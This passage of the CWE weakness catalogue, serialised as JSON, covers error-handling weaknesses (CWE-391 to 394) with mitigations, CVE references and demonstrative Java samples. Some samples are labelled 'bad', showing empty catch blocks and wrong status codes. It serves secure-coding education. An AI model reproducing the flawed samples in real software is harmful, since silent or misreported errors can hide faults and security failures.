buffer;","xhtml:br":["","","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"throw \\"Unable to open file \\" + filename;","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw \\"Unable to read from file \\" + filename;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"printf(\\"Error: %s \\\\n\\", str);infile.close();throw str;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"printf(\\"Error occurred trying to read from file \\\\n\\");infile.close();throw;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["",""]}}}}],"Body_Text":"The catch statement should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following C++ example contains two catch statements. The first of these will catch a specific error thrown within the try block, and the second catch statement will catch all other errors from within the catch block. Both catch statements will notify the user that an error has occurred, close the file, and rethrow to the block that called the readFile() method for further handling or possible termination of the program."},{"Intro_Text":"In the following Java example the method readFile will read the file whose name is provided in the input parameter and will return the contents of the file in a String object. The constructor of the FileReader object and the read method call may throw exceptions and therefore must be within a try/catch block. While the catch statement in this example will catch thrown exceptions in order for the method to compile, no processing is performed to handle the thrown exceptions. Catch statements that do not perform any processing will have unexpected results. In this case, this will result in the return of a null String.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String readFile(String filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String retString = null;try {} catch (Exception ex) {}return retString;","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file);// initialize character bufferlong fLen = file.length();char[] cBuf = new char[(int) fLen];// read data from fileint iRead = fr.read(cBuf, 0, (int) fLen);// close filefr.close();retString = new String(cBuf);","xhtml:br":["","","","","","","","","","","","","","",""]}},{"#text":"/* do nothing, but catch so it\'ll compile... */","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public String readFile(String filename) throws FileNotFoundException, IOException, Exception {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String retString = null;try {} catch (FileNotFoundException ex) {} catch (IOException ex) {} catch (Exception ex) {}return retString;","xhtml:br":["",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// initialize File and FileReader objectsFile file = new File(filename);FileReader fr = new FileReader(file);// initialize character bufferlong fLen = file.length();char [] cBuf = new char[(int) fLen];// read data from fileint iRead = fr.read(cBuf, 0, (int) fLen);// close filefr.close();retString = new String(cBuf);","xhtml:br":["","","","","","","","","","","","","","",""]}},{"#text":"System.err.println (\\"Error: FileNotFoundException opening the input file: \\" + filename );System.err.println (\\"\\" + ex.getMessage() );throw new FileNotFoundException(ex.getMessage());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"System.err.println(\\"Error: IOException reading the input file.\\\\n\\" + ex.getMessage() );throw new IOException(ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Error: Exception reading the input file.\\\\n\\" + ex.getMessage() );throw new Exception(ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}],"Body_Text":"The catch statement should contain statements that either attempt to fix the problem, notify the user that an exception has been raised and continue processing, or perform some cleanup and gracefully terminate the program. The following Java example contains three catch statements. The first of these will catch the FileNotFoundException that may be thrown by the FileReader constructor called within the try/catch block. The second catch statement will catch the IOException that may be thrown by the read method called within the try/catch block. The third catch statement will catch all other exceptions thrown within the try block. For all catch statements the user is notified that the exception has been thrown and the exception is rethrown to the block that called the readFile() method for further processing or possible termination of the program. Note that with Java it is usually good practice to use the getMessage() method of the exception class to provide more information to the user about the exception raised."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Improper error handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR00-J","Entry_Name":"Do not suppress or ignore checked exceptions"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 11: Failure to Handle Errors Correctly.&#34; Page 183"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Improper Error Handling","attr":{"@_Date":"2008-04-11"}}}},"391":{"attr":{"@_ID":"391","@_Name":"Unchecked Error Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"[PLANNED FOR DEPRECATION. SEE MAINTENANCE NOTES AND CONSIDER CWE-252, CWE-248, OR CWE-1069.] Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"The choice between a language which has named or unnamed exceptions needs to be done. While unnamed exceptions exacerbate the chance of not properly dealing with an exception, named exceptions suffer from the up call version of the weak base class problem."},{"Phase":"Requirements","Description":"A language can be used which requires, at compile time, to catch all serious exceptions. However, one must make sure to use the most current version of the API as new exceptions could be added."},{"Phase":"Implementation","Description":"Catch all relevant exceptions. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code excerpt ignores a rarely-thrown exception from doExchange().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (RareException e) {}","xhtml:div":[{"#text":"doExchange();","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// this can never happen"}}],"xhtml:br":""}},"Body_Text":"If a RareException were to ever be thrown, the program would continue to execute as though nothing unusual had occurred. The program records no evidence indicating the special situation, potentially frustrating any later attempt to explain the program\'s behavior."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unchecked Return Value"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Empty Catch Block"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Uncaught exception"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR00-C","Entry_Name":"Adopt and implement a consistent and comprehensive error-handling policy"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR34-C","Entry_Name":"Detect errors when converting a string to a number","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP32-C","Entry_Name":"Prevent or detect domain and range errors in math functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":[{"#text":"This entry is slated for deprecation; it has multiple widespread interpretations by CWE analysts.  It currently combines information from three different taxonomies, but each taxonomy is talking about a slightly different issue.  CWE analysts might map to this entry based on any of these issues.  7PK has \\"Empty Catch Block\\" which has an association with empty exception block (CWE-1069); in this case, the exception has performed the check, but does not handle.  In PLOVER there is \\"Unchecked Return Value\\" which is CWE-252, but unlike \\"Empty Catch Block\\" there isn\'t even a check of the issue - and \\"Unchecked Error Condition\\" implies lack of a check.  For CLASP, \\"Uncaught Exception\\" (CWE-248) is associated with incorrect error propagation - uncovered in CWE 3.2 and earlier, at least.  There are other issues related to error handling and checks.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Other"},"xhtml:p":"When a programmer ignores an exception, they implicitly state that they are operating under one of two assumptions:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["This method call can never fail.","It doesn\'t matter if this call fails."]}}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"392":{"attr":{"@_ID":"392","@_Name":"Missing Report of Error Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software encounters an error but does not provide a status code or return value to indicate that an error has occurred.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"],"Note":"Errors that are not properly reported could place the system in an unexpected state that could lead to unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following snippet from a doPost() servlet method, the server returns \\"200 OK\\" (default) even if an error occurs.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (Throwable t) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// Something that may throw an exception."}},{"#text":"logger.error(\\"Caught: \\" + t.toString());return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0063","Description":"Function returns \\"OK\\" even if another function returns a different status code than expected, leading to accepting an invalid PIN number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0063"},{"Reference":"CVE-2002-1446","Description":"Error checking routine in PKCS#11 library returns \\"OK\\" status even when invalid signature is detected, allowing spoofed messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1446"},{"Reference":"CVE-2002-0499","Description":"Kernel function truncates long pathnames without generating an error, leading to operation on wrong directory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0499"},{"Reference":"CVE-2005-2459","Description":"Function returns non-error value when a particular erroneous condition is encountered, leading to resultant NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2459"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Error Status Code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"TPS03-J","Entry_Name":"Ensure that tasks executing in a thread pool do not fail silently"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Missing Error Status Code","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Report Error in Status Code","attr":{"@_Date":"2010-12-13"}}]}},"393":{"attr":{"@_ID":"393","@_Name":"Return of Wrong Status Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A function or operation returns an incorrect return value or status code that does not indicate an error, but causes the product to modify its behavior based on the incorrect result.","Extended_Description":"This can lead to unpredictable behavior. If the function is used to make security-critical decisions or provide security-critical information, then the wrong status code can cause the software to assume that an action is safe, even when it is not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Alter Execution Logic"],"Note":"This weakness could place the system in a state that could lead unexpected logic to be executed or other unintended behaviors."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, an HTTP 404 status code is returned in the event of an IOException encountered in a Java servlet. A 404 code is typically meant to indicate a non-existent resource and would be somewhat misleading in this case.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch (IOException ioe) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// something that might throw IOException"}},{"#text":"response.sendError(SC_NOT_FOUND);","attr":{"@_style":"margin-left:10px;"}}]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-1132","Description":"DNS server returns wrong response code for non-existent AAAA record, which effectively says that the domain is inaccessible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1132"},{"Reference":"CVE-2001-1509","Description":"Hardware-specific implementation of system call causes incorrect results from geteuid.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1509"},{"Reference":"CVE-2001-1559","Description":"System call returns wrong value, leading to a resultant NULL dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1559"},{"Reference":"CVE-2014-1266","Description":"chain: incorrect \\"goto\\" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple \\"goto fail\\" bug). CWE-705 (Incorrect Control Flow Scoping) -&gt; CWE-561 (Dead Code) -&gt; CWE-295 (Improper Certificate Validation) -&gt; CWE-393 (Return of Wrong Status Code) -&gt; CWE-300 (Channel Accessible by Non-Endpoint).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wrong Status Code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP6","Entry_Name":"Incorrect Exception Behavior"}]},"Notes":{"Note":{"#text":"This can be primary or resultant, but it is probably most often primary to other issues.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Wrong Status Code","attr":{"@_Date":"2008-04-11"}}}},"394":{"attr":{"@_ID":"394","@_Name":"Unexpected Status Code or Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly check when a function or operation returns a value that is legitimate for the function, but is not expected by the software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1395","Description":"Certain packets (zero byte and other lengths) cause a recvfrom call to produce an unexpected return code that causes a server\'s listening loop to exit.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1395"},{"Reference":"CVE-2002-2124","Description":"Unchecked return code from recv() leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2124"},{"Reference":"CVE-2005-2553","Description":"Kernel function does not properly handle when a null is returned by a function call, causing it to call another function that it shouldn\'t.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2553"},{"Reference":"CVE-2005-1858","Description":"Memory not properly cleared when read() function call returns fewer bytes than expected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1858"},{"Reference":"CVE-2000-0536","Description":"Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0536"},{"Reference":"CVE-2001-0910","Description":"Bypass access restrictions when connecting from IP whose DNS reverse lookup does not return a hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0910"},{"Reference":"CVE-2004-2371","Description":"Game server doesn\'t check return values for functions that handle text strings and associated size values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2371"},{"Reference":"CVE-2005-1267","Description":"Resultant infinite loop when function call returns -1 value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1267"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unexpected Status Code or Return Value"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP00-PL","Entry_Name":"Do not return undef","Mapping_Fit":"Imprecise"}]},"Notes":{"Note":{"#text":"Usually primary, but can be resultant from issues such as behavioral change or API abuse. This can produce resultant vulnerabilities.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 